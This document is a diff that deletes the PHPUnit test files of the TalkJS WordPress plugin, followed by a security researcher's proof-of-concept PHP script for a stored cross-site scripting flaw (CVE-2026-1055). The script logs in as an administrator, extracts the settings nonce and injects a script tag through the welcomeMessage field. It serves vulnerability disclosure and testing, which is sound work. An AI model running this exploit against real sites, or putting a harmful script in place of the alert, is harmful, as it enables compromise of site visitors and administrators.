-	 * Generate an author, place 'em in the global scope
-	 *
-	 * @return void
-	 */
-	public function makeAuthor()
-	{
-		$authorId = self::factory()->user->create( ['role' => 'administrator']);
-    	$author = get_user_by( 'ID', $authorId );
-
-    	//populate the authordata global
-		$GLOBALS['authordata'] = $author;
-
-		return $author;
-	}
-
-
-	/**
-	 * Set the settings
-	 *
-	 * @return void
-	 */
-	public function setSettings()
-	{
-		Settings::set( 'appid', 'test' );
-		Settings::set( 'secretkey', 'test' );
-		Settings::set( 'mustBeLoggedIn', false );
-	}
-
-}
--- a/talkjs/tests/test-fields.php
+++ b/talkjs/tests/test-fields.php
@@ -1,150 +0,0 @@
-<?php
-/**
- * Class FieldTest
- *
- * @package TalkJS
- */
-
-use TalkJSFacadesField;
-use TalkJSHelpersUser;
-use TalkJSHelpersSettings;
-
-/**
- * Field Tests
- */
-class FieldTests extends BaseTest {
-
-	/** Test */
-	function test_it_can_generate_a_text_field()
-	{
-		$this->assertTrue( method_exists( 'TalkJSAdminUiFieldBuilder', 'text' ) );
-		$html = Field::text( 'test' )->render();
-		$this->assertContains( '<input type="text"', $html );
-	}
-
-	/** Test */
-	function test_it_can_generate_a_textarea()
-	{
-		$this->assertTrue( method_exists( 'TalkJSAdminUiFieldBuilder', 'textarea' ) );
-		$html = Field::textarea( 'test' )->render();
-		$this->assertContains( '<textarea', $html );
-	}
-
-
-	/** Test */
-	function test_it_can_generate_a_checkbox()
-	{
-		$this->assertTrue( method_exists( 'TalkJSAdminUiFieldBuilder', 'checkbox' ) );
-		$html = Field::checkbox( 'test' )->render();
-		$this->assertContains( '<input type="checkbox"', $html );
-	}
-
-
-	/** Test */
-	function test_it_can_generate_a_select()
-	{
-		$this->assertTrue( method_exists( 'TalkJSAdminUiFieldBuilder', 'select' ) );
-		$html = Field::select( 'test', [ 'choices' => $this->getChoices() ] )->render();
-		$this->assertContains( '<select', $html );
-	}
-
-
-	/** Test */
-	function test_it_can_take_multiple_select_items()
-	{
-		$choices = $this->getChoices();
-		$values = [ 'two', 'three' ];
-		$field = Field::select( 'test', [ 'multiple' => true, 'choices' => $choices, 'value' => $values ]);
-
-		$this->assertTrue( $field->isSelected( 'two' ) );
-		$this->assertFalse( $field->isSelected( 'one' ) );
-
-		//it returns an array for the field value:
-		$this->assertTrue( is_array( $field->getValue() ) );
-
-		//see if it outputs selected html
-		$html = $field->render();
-		$this->assertContains( '<option value="two" selected', $html );
-	}
-
-	/** Test */
-	function test_it_adds_a_hidden_field_to_a_checkbox_to_capture_false_checkboxes()
-	{
-		$field = Field::checkbox( 'test' );
-		$html = $field->render();
-
-		$this->assertContains( '<input type="hidden"', $html );
-	}
-
-	/** Test */
-	function test_it_generates_a_field_id()
-	{
-		$field = Field::text( 'test' );
-		$this->assertEquals( $field->getFieldId(), 'field-test-text' );
-
-		$html = $field->render();
-		$this->assertContains( 'id="field-test-text"', $html );
-	}
-
-	/** Test */
-	function test_it_renders_a_label_if_set()
-	{
-		$html = $this->getFieldHtml();
-		$this->assertNotContains( '<label', $html );
-
-		$html = $this->getFieldHtml([ 'label' => 'My Label' ]);
-		$this->assertContains( 'My Label</label>', $html );
-	}
-
-
-	/** Test */
-	function test_it_adds_validation_data()
-	{
-		$html = $this->getFieldHtml();
-		$this->assertNotContains( 'data-validate', $html );
-
-		$html = $this->getFieldHtml([ 'validation' => ['required'] ]);
-		$this->assertContains( 'data-validate', $html );
-	}
-
-
-	/** Test */
-	function test_it_creates_a_validation_string()
-	{
-		$field = Field::text( 'test', ['validation' => [ 'required', 'number' ]]);
-		$html = $field->render();
-
-		$this->assertEquals( $field->getProp('validation-string'), 'required,number' );
-		$this->assertContains( 'data-validate="required,number"', $html );
-	}
-
-
-	/**
-	 * Get a field's html
-	 *
-	 * @param  array  $args
-	 *
-	 * @return String
-	 */
-	public function getFieldHtml( $args = [] )
-	{
-		$field = Field::text( 'test', $args );
-		return $field->render();
-	}
-
-
-	/**
-	 * Returns test choices for a select box
-	 *
-	 * @return array
-	 */
-	public function getChoices()
-	{
-		return [
-			[ 'label' => 'One', 'value' => 'one' ],
-			[ 'label' => 'Two', 'value' => 'two' ],
-			[ 'label' => 'Three', 'value' => 'three' ]
-		];
-	}
-
-}
--- a/talkjs/tests/test-inbox-page-generator.php
+++ b/talkjs/tests/test-inbox-page-generator.php
@@ -1,120 +0,0 @@
-<?php
-/**
- * Class InboxPageGeneratorTests
- *
- * @package TalkJS
- */
-
-use TalkJSInboxShortcode;
-use TalkJSInboxPageGenerator;
-use TalkJSExceptionsPageGeneratorException;
-
-class InboxPageGeneratorTests extends BaseTest {
-
-
-	/** Test */
-	function test_it_can_check_if_a_page_has_been_generated()
-	{
-
-		$this->assertTrue(
-			method_exists( 'TalkJSInboxPageGenerator', 'check' ),
-			'The page generator doesn't have a check method'
-		);
-
-		//remove the inbox_page option, to be certain
-		delete_option( 'talkjs_inbox_page' );
-
-		$generator = $this->getGenerator();
-
-		$this->assertFalse( $generator->check() );
-	}
-
-
-	/** Test */
-	function test_it_can_generate_pages_and_return_their_ids()
-	{
-		$generator = $this->getGenerator();
-
-		try{
-
-			$this->assertInternalType( 'int', $generator->generate() );
-
-		} catch( PageGeneratorException $exception ) {
-
-			$this->fail( $exception->getMessage() );
-
-		}
-	}
-
-
-	/** Test */
-	function test_it_can_check_if_the_generated_page_still_exists()
-	{
-		$this->assertTrue(
-			method_exists( 'TalkJSInboxPageGenerator', 'exists' ),
-			'The page generator doesn't have an exists method'
-		);
-
-
-		$generator = $this->getGenerator();
-		$generator->generate();
-
-		$this->assertTrue( $generator->exists() );
-
-	}
-
-
-	/** Test */
-	function test_it_adds_the_inbox_shortcode_to_the_page()
-	{
-		$page = $this->getGeneratedPost();
-		$this->assertContains( Shortcode::get(), $page->post_content );
-	}
-
-
-	/** Test */
-	function test_it_doesnt_autopublish_the_page()
-	{
-		$page = $this->getGeneratedPost();
-		$this->assertEquals( $page->post_status, 'draft' );
-	}
-
-
-	/** Test */
-	function test_it_doesnt_generate_if_a_page_already_exists()
-	{
-		$generator = $this->getGenerator();
-
-		update_option( $generator::OPTION, 3 );
-
-		$this->assertFalse( $generator->maybeGenerate() );
-	}
-
-
-	/**
-	 * Creates a generator for our tests
-	 *
-	 * @return TalkJSInboxPageGenerator
-	 */
-	public function getGenerator()
-	{
-		return new PageGenerator();
-	}
-
-
-	/**
-	 * Returns the generated post
-	 *
-	 * @return WP_Post
-	 */
-	public function getGeneratedPost()
-	{
-		$generator = $this->getGenerator();
-		$id = $generator->generate();
-
-		$page = get_post( $id );
-		return $page;
-
-	}
-
-}
--- a/talkjs/tests/test-inbox.php
+++ b/talkjs/tests/test-inbox.php
@@ -1,63 +0,0 @@
-<?php
-/**
- * Class InboxTests
- *
- * @package TalkJS
- */
-
-use TalkJSHelpersSettings;
-use TalkJSFacadesInbox;
-
-/**
- * Inbox Tests
- */
-class InboxTests extends BaseTest {
-
-
-	/** Test */
-	public function test_it_has_a_render_method()
-	{
-		$this->assertTrue( method_exists( 'TalkJSInboxManager', 'render' ) );
-	}
-
-
-	/** Test */
-	function test_it_checks_if_the_user_is_logged_in()
-	{
-
-		$this->getInbox();
-		Settings::set( 'mustBeLoggedIn', true );
-
-		//it should be valid now:
-		$this->assertTrue( Inbox::isValid() );
-
-		$this->logout();
-		Settings::set( 'mustBeLoggedIn', false );
-
-		//it should still be valid now:
-		$this->assertTrue( Inbox::isValid() );
-
-	}
-
-
-	/** Test */
-	function test_it_outputs_the_right_javascript()
-	{
-		$inbox = $this->getInbox();
-		$this->assertContains( 'talkSession.createInbox()', $inbox->getHtml() );
-		$this->assertContains( 'inbox.mount(document.getElementById("talkjs-inbox-container"))', $inbox->getHtml() );
-		$this->assertContains( '<div id="talkjs-inbox-container"', $inbox->getHtml() );
-	}
-
-
-	/** Populate the settings with test data */
-	public function getInbox()
-	{
-		Settings::set( 'appid', 'test' );
-		Settings::set( 'secretkey', 'test' );
-		Settings::set( 'mustBeLoggedIn', false );
-
-		$inbox = Inbox::make();
-		return $inbox;
-	}
-}
--- a/talkjs/tests/test-notifications.php
+++ b/talkjs/tests/test-notifications.php
@@ -1,78 +0,0 @@
-<?php
-/**
- * Class NotificationTests
- *
- * @package TalkJS
- */
-
-use TalkJSFacadesInbox;
-use TalkJSHelpersSettings;
-use TalkJSInboxPageGenerator;
-use TalkJSTraitsImplementsTalkSession;
-
-/**
- * Inbox Tests
- */
-class NotificationTests extends BaseTest {
-
-	/** Test */
-	public function test_it_adds_a_classname_to_the_inbox_page_menu_item()
-	{
-		$menuItem = new stdClass();
-		$menuItem->object_id = '4';
-
-		//set the inbox page ID
-		update_option( PageGenerator::OPTION, '4' );
-
-		$classes = apply_filters( 'nav_menu_css_class', [], $menuItem );
-
-		$this->assertTrue( is_array( $classes ) );
-		$this->assertContains( 'talkjs-inbox', $classes );
-	}
-
-
-	/** Test */
-	public function test_it_checks_for_the_inbox_menu_class()
-	{
-		$this->assertContains( 'document.getElementsByClassName("talkjs-inbox")', $this->getHtml() );
-	}
-
-
-	/** Test */
-	public function test_it_inserts_the_badge()
-	{
-		$this->assertContains( 'var badgeHtml = document.createElement("div");', $this->getHtml() );
-		$this->assertContains( 'badgeHtml.setAttribute( "id", "notification-badge" )', $this->getHtml() );
-	}
-
-
-	/** Test */
-	public function test_it_checks_for_changes()
-	{
-		$this->assertContains( 'window.talkSession.unreads.on( "change"', $this->getHtml() );
-	}
-
-
-	/** Populate the settings with test data */
-	public function getSession()
-	{
-		Settings::set( 'appid', 'test' );
-		Settings::set( 'secretkey', 'test' );
-		Settings::set( 'mustBeLoggedIn', false );
-
-		$session = ( new ImplementsTalkSession() )->make([]);
-		return $session;
-	}
-
-
-	/**
-	 * Returns the html of the ImplementsTalkSession class
-	 *
-	 * @return String
-	 */
-	public function getHtml()
-	{
-		$session = $this->getSession()->make();
-		return $session->getHtml();
-	}
-}
--- a/talkjs/tests/test-settings.php
+++ b/talkjs/tests/test-settings.php
@@ -1,232 +0,0 @@
-<?php
-/**
- * Class ApiTests
- *
- * @package TalkJS
- */
-
-use TalkJSHelpersUser;
-use TalkJSFacadesField;
-use TalkJSHelpersSession;
-use TalkJSHelpersSettings;
-use TalkJSFacadesSettingsPage;
-use TalkJSExceptionsSettingsPageException;
-
-use TalkJSAdminUiNotifications;
-
-/**
- * Api Tests
- */
-class SettingsTest extends BaseTest {
-
-	/** Test */
-	function test_it_can_create_a_settings_page()
-	{
-		$this->assertTrue( class_exists( 'TalkJSAdminUiSettingsPage' ) );
-		$this->assertTrue( method_exists( 'TalkJSAdminUiSettingsPage', 'make' ) );
-	}
-
-	/** Test */
-	function test_it_can_check_user_capabilities()
-	{
-
-		$role = get_role( 'administrator' );
-		$role->remove_cap( 'edit-talkjs-settings' );
-
-		$page = SettingsPage::make(
-			'Test Settings',
-			Settings::page(),
-			[
-				'parent' => 'options-general.php',
-				'capabilities' => 'edit-talkjs-settings'
-			]
-		);
-
-		$page->set([ Field::text( 'testInput' )]);
-
-		//display returns a null if the current user doesn't
-		//have the capability 'edit-talkjs-settings'
-		$this->assertNull( $page->display() );
-
-
-		$role->add_cap( 'edit-talkjs-settings' );
-
-		//re login:
-		$this->auth();
-
-		//and check again:
-		$this->assertTrue( $page->display() );
-
-	}
-
-
-	/** Test */
-	function test_it_cant_add_a_page_without_fields()
-	{
-
-		$page = $this->create();
-		$this->expectException( SettingsPageException::class );
-		$page->set();
-
-	}
-
-
-	/** Test */
-	function test_it_has_a_nonce()
-	{
-		$page = $this->createWithFields();
-		$nonce = wp_nonce_field( Session::nonceAction, Session::nonceName, true, false );
-
-		ob_start();
-		$page->render();
-		$html = ob_get_clean();
-
-		$this->assertContains( $nonce, $html );
-	}
-
-
-	/** Test */
-	function test_it_can_display_fields()
-	{
-
-		$page = $this->create();
-		$field = Field::text( 'testField', [ 'label' => 'TestField' ] );
-
-		$page->set([ $field, Field::textarea( 'testArea' ) ]);
-
-		//check if the field count checks out:
-		$this->assertCount( 2, $page->getFields() );
-
-		ob_start();
-		$page->render();
-		$html = ob_get_clean();
-
-		$this->assertContains( $field->render(), $html );
-	}
-
-
-	/** Test */
-	function test_it_needs_a_nonce_to_be_saved()
-	{
-
-		$page = $this->createWithFields();
-
-		//saving without a nonce is impossible
-		$this->assertNull( $page->save() );
-
-	}
-
-
-	/** Test */
-	function test_it_saves_its_fields()
-	{
-
-		$page = $this->createWithFields();
-
-		//save fields, without checking the nonce:
-		$page->saveFields( $page->getFields() );
-
-		//and check the saved options:
-		$options = get_option( Settings::optionName() );
-
-		$this->assertNotFalse( $options, 'Settings didn't get saved.' );
-		$this->assertCount( 1, $options );
-	}
-
-	/** Test */
-	function test_it_returns_a_boolean_even_if_its_a_string()
-	{
-		Settings::set( 'mustBeLoggedIn', 'false' );
-		$this->assertFalse( Settings::get( 'mustBeLoggedIn' ) );
-
-		Settings::set( 'mustBeLoggedIn', 'true' );
-		$this->assertTrue( Settings::get( 'mustBeLoggedIn' ) );
-	}
-
-	/** Test */
-	function test_it_has_the_proper_defaults()
-	{
-		$defaults = array_keys( Settings::getDefaults() );
-		$settingsPage = TalkJSAdminSettingsPageCreator::getInstance();
-        $fields = $settingsPage->getFields();
-
-		$names = [];
-		foreach( $fields as $field ){
-
-			$name = $field->getName();
-			if( !in_array( $name, $names ) )
-				$names[] = $name;
-		}
-
-		$names[] = 'defaultUser';
-		$names[] = 'mustBeLoggedIn';
-		sort( $names );
-		sort( $defaults );
-
-		$this->assertEquals( $defaults, $names );
-    }
-
-    /** Test */
-    function test_it_can_save_its_data()
-    {
-        $page = $this->createWithFields();
-        $_POST['testField'] = 'my value';
-        $page->saveFields( $page->getFields() );
-
-        $option = get_option( Settings::optionName() );
-        $this->assertEquals( $option, $_POST );
-
-        $_POST['_nonce'] = 'crap-data';
-        $this->assertNotEquals( $option, $_POST );
-    }
-
-    /** Test */
-    function test_it_can_change_its_dataset()
-    {
-
-        $page = SettingsPage::make(
-                'Test Settings',
-                Settings::page(),
-                [
-                    'parent' => 'options-general.php',
-                    'dataset' => 'test-data'
-                ]
-        );
-
-        $fields = [ Field::text( 'testField', [ 'label' => 'Test Field' ]) ];
-        $page->set( $fields );
-
-        $_POST['testField'] = 'test-value';
-        $page->saveFields( $fields );
-
-        $testData = get_option( 'test-data' );
-        $this->assertEquals( $testData, $_POST );
-    }
-
-
-	/************************************************/
-	/**      Helper functions                       */
-	/************************************************/
-
-	/**
-	 * Create a page with fields
-	 *
-	 * @return SettingsPage
-	 */
-	public function create()
-	{
-		return SettingsPage::make( 'Test Settings', Settings::page(), [ 'parent' => 'options-general.php' ] );
-	}
-
-	/**
-	 * Create a page with fields
-	 *
-	 * @return SettingsPage
-	 */
-	public function createWithFields()
-	{
-		$page = $this->create();
-		$field = Field::text( 'testField', [ 'label' => 'Test Field' ]);
-		return $page->set([ $field ]);
-	}
-}
--- a/talkjs/tests/test-talk-session.php
+++ b/talkjs/tests/test-talk-session.php
@@ -1,68 +0,0 @@
-<?php
-/**
- * Class TalkSessionTest
- *
- * @package TalkJS
- */
-
-use TalkJSFacadesInbox;
-use TalkJSHelpersSettings;
-use TalkJSTraitsImplementsTalkSession;
-
-/**
- * Inbox Tests
- */
-class TalkSessionTest extends BaseTest {
-
-
-	/** Test */
-	public function test_it_has_a_working_start_method()
-	{
-		$this->assertTrue( method_exists( 'TalkJSTraitsImplementsTalkSession', 'start' ) );
-		$this->assertContains( 'Talk.ready.then(function()', $this->getHtml() );
-	}
-
-	/** Test */
-	public function test_it_has_a_working_end_method()
-	{
-		$this->assertTrue( method_exists( 'TalkJSTraitsImplementsTalkSession', 'end' ) );
-		$this->assertContains( '});</script>', $this->getHtml() );
-	}
-
-
-	/** test */
-	public function test_it_can_include_the_script()
-	{
-		$GLOBALS['talkjs_session'] = false;
-		$this->assertTrue( method_exists( 'TalkJSTraitsImplementsTalkSession', 'includeScript' ) );
-		$this->assertContains( 'function(t,a,l,k,j,s)', $this->getHtml() );
-
-		//test with the global session on, output should be gone:
-		$GLOBALS['talkjs_session'] = true;
-		$this->assertNotContains( 'function(t,a,l,k,j,s)', $this->getHtml() );
-	}
-
-
-	/** Populate the settings with test data */
-	public function getSession()
-	{
-		Settings::set( 'appid', 'test' );
-		Settings::set( 'secretkey', 'test' );
-		Settings::set( 'mustBeLoggedIn', false );
-
-		$session = ( new ImplementsTalkSession() )->make([]);
-		return $session;
-	}
-
-
-	/**
-	 * Returns the html of the ImplementsTalkSession class
-	 *
-	 * @return String
-	 */
-	public function getHtml()
-	{
-		$session = $this->getSession()->make();
-		return $session->getHtml();
-	}
-}
--- a/talkjs/tests/test-urls.php
+++ b/talkjs/tests/test-urls.php
@@ -1,30 +0,0 @@
-<?php
-/**
- * Class ApiTests
- *
- * @package TalkJS
- */
-
-use TalkJSHelpersUrl;
-use TalkJSHelpersSettings;
-
-/**
- * Sample test case.
- */
-class UrlTests extends WP_UnitTestCase {
-
-	/**
-	 * A single example test.
-	 */
-	function test_settings_page_url() {
-
-		$slug = Settings::page();
-		$url = Url::settingsPage();
-
-		$this->assertEquals( $slug, 'talkjs-settings' );
-		$this->assertEquals( $url, admin_url( 'options-general.php?page='. $slug ) );
-
-	}
-
-
-}
--- a/talkjs/tests/test-widget.php
+++ b/talkjs/tests/test-widget.php
@@ -1,112 +0,0 @@
-<?php
-/**
- * Class WidgetTests
- *
- * @package TalkJS
- */
-
-use TalkJSChatWidget;
-use TalkJSHelpersSettings;
-
-/**
- * Widget Tests
- */
-class WidgetTests extends WP_UnitTestCase {
-
-	/**
-	 * A notification gets displayed if there's no api-key setting
-	 */
-	function test_it_has_fields() {
-
-		$this->assertTrue( method_exists( 'TalkJSChatWidget', 'getFields' ) );
-		$widget = $this->getWidget();
-
-		$this->assertNotEmpty( $widget->getFields( $this->getSettings() ) );
-	}
-
-
-	/** Test */
-	function test_it_displays_fields()
-	{
-		$widget = $this->getWidget();
-		$fields = array_values( $widget->getFields( $this->getSettings ) );
-		$field = $fields[0];
-
-		ob_start();
-
-			$widget->form( $this->getSettings );
-
-		$html = ob_get_clean();
-
-		$this->assertContains( $field->render(), $html );
-	}
-
-
-	/** Test */
-	function test_it_can_update_its_title()
-	{
-		$this->assertSavedAs( 'title', 'My new title' );
-	}
-
-	/** Test */
-	function test_it_can_update_the_welcome_message()
-	{
-		$this->assertSavedAs( 'welcome', 'Hi there!' );
-	}
-
-
-	/** Test */
-	function test_it_strips_html_from_the_title_field()
-	{
-		$title = '<h1>My Title</h1>';
-		$this->assertSavedAs( 'title', $title, strip_tags( $title ) );
-	}
-
-
-	/**
-	 * Check if things are saved the way they ought to be saved
-	 *
-	 * @return bool
-	 */
-	public function assertSavedAs( $field, $new, $expected = null )
-	{
-		if( is_null( $expected ) )
-			$expected = $new;
-
-		$widget = $this->getWidget();
-		$settings = $widget->update([ $field => $new ], []);
-
-		$this->assertSame( $settings[ $field ], $expected );
-	}
-
-
-
-	/**
-	 * Returns a functioning widget
-	 *
-	 * @return WP_Widget instance
-	 */
-	public function getWidget()
-	{
-		$widget = new Widget();
-		$widget->update( $this->getSettings(), [] );
-		return $widget;
-	}
-
-	/**
-	 * Returns the settings as an array
-	 *
-	 * @return Array
-	 */
-	public function getSettings()
-	{
-		$settings = [
-			'title' => 'Chat',
-			'welcome' => 'hi there',
-			'chatWith' => 'author'
-		];
-
-		return $settings;
-	}
-
-}

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1055 - TalkJS <= 0.1.15 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'welcomeMessage' Parameter

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';

// Malicious JavaScript payload to inject
$payload = '</textarea><script>alert("Atomic Edge XSS Test");</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute login and capture cookies
$response = curl_exec($ch);

// Check if login was successful by accessing admin dashboard
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Navigate to TalkJS settings page to obtain nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=talkjs-settings');
$response = curl_exec($ch);

// Extract nonce from the settings page form
preg_match('/name="talkjs_nonce" value="([^"]+)"/', $response, $matches);
if (empty($matches[1])) {
    die('Could not extract nonce from settings page.');
}
$nonce = $matches[1];

// Prepare exploit payload for welcomeMessage parameter
$exploit_data = [
    'talkjs_nonce' => $nonce,
    'talkjs-settings' => 'Save Changes',
    'welcomeMessage' => $payload,
    // Include other required fields to avoid validation errors
    'appId' => 'test_app',
    'secretKey' => 'test_key',
    'mustBeLoggedIn' => '0',
    'roles[]' => ['subscriber']
];

// Submit the malicious payload to the settings form
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=talkjs-settings');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Verify the payload was stored by checking response
if (strpos($response, 'Settings saved') !== false || strpos($response, $payload) !== false) {
    echo "Exploit successful! XSS payload injected into welcomeMessage.n";
    echo "Visit any page with the TalkJS chat widget to trigger execution.n";
} else {
    echo "Exploit may have failed. Check permissions and plugin version.n";
}

curl_close($ch);

?>